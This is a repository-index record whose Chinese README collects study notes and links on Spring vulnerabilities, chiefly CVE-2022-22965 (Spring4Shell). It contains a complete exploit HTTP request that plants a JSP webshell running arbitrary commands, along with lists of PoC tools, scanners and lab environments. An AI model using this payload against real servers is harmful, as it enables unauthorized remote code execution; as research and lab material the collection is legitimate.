{"id":19520096,"url":"https://github.com/hackjava/spring","last_synced_at":"2025-10-12T22:41:29.315Z","repository":{"id":63112674,"uuid":"475495888","full_name":"HackJava/Spring","owner":"HackJava","description":"《Spring漏洞研究》","archived":false,"fork":false,"pushed_at":"2022-04-26T13:08:31.000Z","size":25125,"stargazers_count":46,"open_issues_count":0,"forks_count":14,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-26T07:35:30.943Z","etag":null,"topics":["0e0w","cve-2022-22965","spring","spring4shell","springshell"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HackJava.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-03-29T15:05:21.000Z","updated_at":"2025-03-19T11:57:25.000Z","dependencies_parsed_at":"2022-11-13T03:45:33.712Z","dependency_job_id":null,"html_url":"https://github.com/HackJava/Spring","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/HackJava/Spring","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HackJava","download_url":"https://codeload.github.com/HackJava/Spring/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279013279,"owners_count":26085250,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-12T02:00:06.719Z","response_time":53,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["0e0w","cve-2022-22965","spring","spring4shell","springshell"],"created_at":"2024-11-11T00:23:47.501Z","updated_at":"2025-10-12T22:41:29.298Z","avatar_url":"https://github.com/HackJava.png","language":null,"readme":"# HackSpring-永恒之春\n\n本项目用来致敬全宇宙最无敌Spring框架！同时也记录自己在学习Spring漏洞过程中遇到的一些内容。本项目会持续更新，本项目创建于2022年3月30日，最近的一次更新时间为2022年4月26日。作者：[0e0w](https://github.com/0e0w)\n\n- [01-Spring基础知识]()\n- [02-Spring框架识别]()\n- [03-Spring上层建筑]()\n- [04-Spring漏洞汇总]()\n- [05-Spring检测利用]()\n- [06-Spring漏洞修复]()\n- [07-Spring分析文章]()\n- [08-Spring靶场环境]()\n\n## 01-Spring基础知识\n\n- Spring\n- SpringBoot\n\n## 02-Spring框架识别\n\n- https://mp.weixin.qq.com/s/cmkTMw_QS8o1wMsRd0E0XQ\n\n## 03-Spring上层建筑\n\n**Spring + ？ = rce ！**\n\n## 04-Spring漏洞汇总\n\n- CVE-2022-22965\n\n## 05-Spring检测利用\n\n如何判断一个网站是否存在Spring漏洞？如何查找内网中存在Sprin漏洞？\n\n一、Payload\n\n```\nPOST / HTTP/1.1\nHost: 127.0.0.1:8090\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: close\nsuffix: %\u003e//\nc1: Runtime\nc2: \u003c%\nDNT: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 761\n\nclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di\u0026class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp\u0026class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT\u0026class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell\u0026class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\n```\n\n二、源码检测\n- https://github.com/webraybtl/springcore_detect\n\n三、漏洞验证\n\n- 测试时发现webshell只能写入一次！第二次失败！\n\n四、漏洞扫描\n\n五、其他工具\n- https://github.com/TheGejr/SpringShell\n- https://github.com/BobTheShoplifter/Spring4Shell-POC\n- https://github.com/kh4sh3i/Spring-CVE\n- https://github.com/GuayoyoCyber/CVE-2022-22965\n- https://github.com/viniciuspereiras/CVE-2022-22965-poc\n- https://github.com/reznok/Spring4Shell-POC\n- https://github.com/jschauma/check-springshell\n- https://github.com/colincowie/Safer_PoC_CVE-2022-22965\n- https://github.com/alt3kx/CVE-2022-22965\n- https://github.com/alt3kx/CVE-2022-22965_PoC\n- https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE\n- https://github.com/light-Life/CVE-2022-22965-GUItools\n- https://github.com/Mr-xn/spring-core-rce\n- https://github.com/Kirill89/CVE-2022-22965-PoC\n- https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE\n- https://github.com/likewhite/CVE-2022-22965\n- https://github.com/mebibite/springhound\n- https://github.com/irgoncalves/f5-waf-enforce-sig-Spring4Shell\n- https://github.com/hktalent/spring-spel-0day-poc\n- https://github.com/darryk10/CVE-2022-22963\n- https://github.com/WeiJiLab/Spring4Shell-POC\n- https://github.com/Corgizz/SpringCloud\n- https://github.com/NewBeginning6/spring-Framework-rce\n- https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE\n- https://github.com/k3rwin/spring-core-rce\n- https://github.com/thelostworldFree/SpringCloud-Config-CVE-2020-5410\n- https://github.com/YanMu2020/SpringScan\n- https://github.com/wearearima/poc-cve-2018-1273\n- https://github.com/metaStor/SpringScan\n- https://github.com/fullhunt/spring4shell-scan\n- https://github.com/Qualys/spring4scanwin\n\n## 06-Spring漏洞修复\n\n## 07-Spring分析文章\n\n- https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html\n- https://bugalert.org/content/notices/2022-03-29-spring.html\n- https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc\n- https://www.springcloud.io/post/2022-03/spring-0day-vulnerability\n- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement\n- https://tttang.com/archive/1532\n\n## 08-Spring靶场环境\n\n- https://github.com/jbaines-r7/spring4shell_vulnapp\n- https://github.com/Kirill89/CVE-2022-22965-PoC\n- https://github.com/DDuarte/springshell-rce-poc\n- https://github.com/XuCcc/VulEnv\n\n[![Stargazers over time](https://starchart.cc//HackJava/Spring.svg)](https://starchart.cc/HackJava/Spring)\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackjava%2Fspring","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackjava%2Fspring","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackjava%2Fspring/lists"}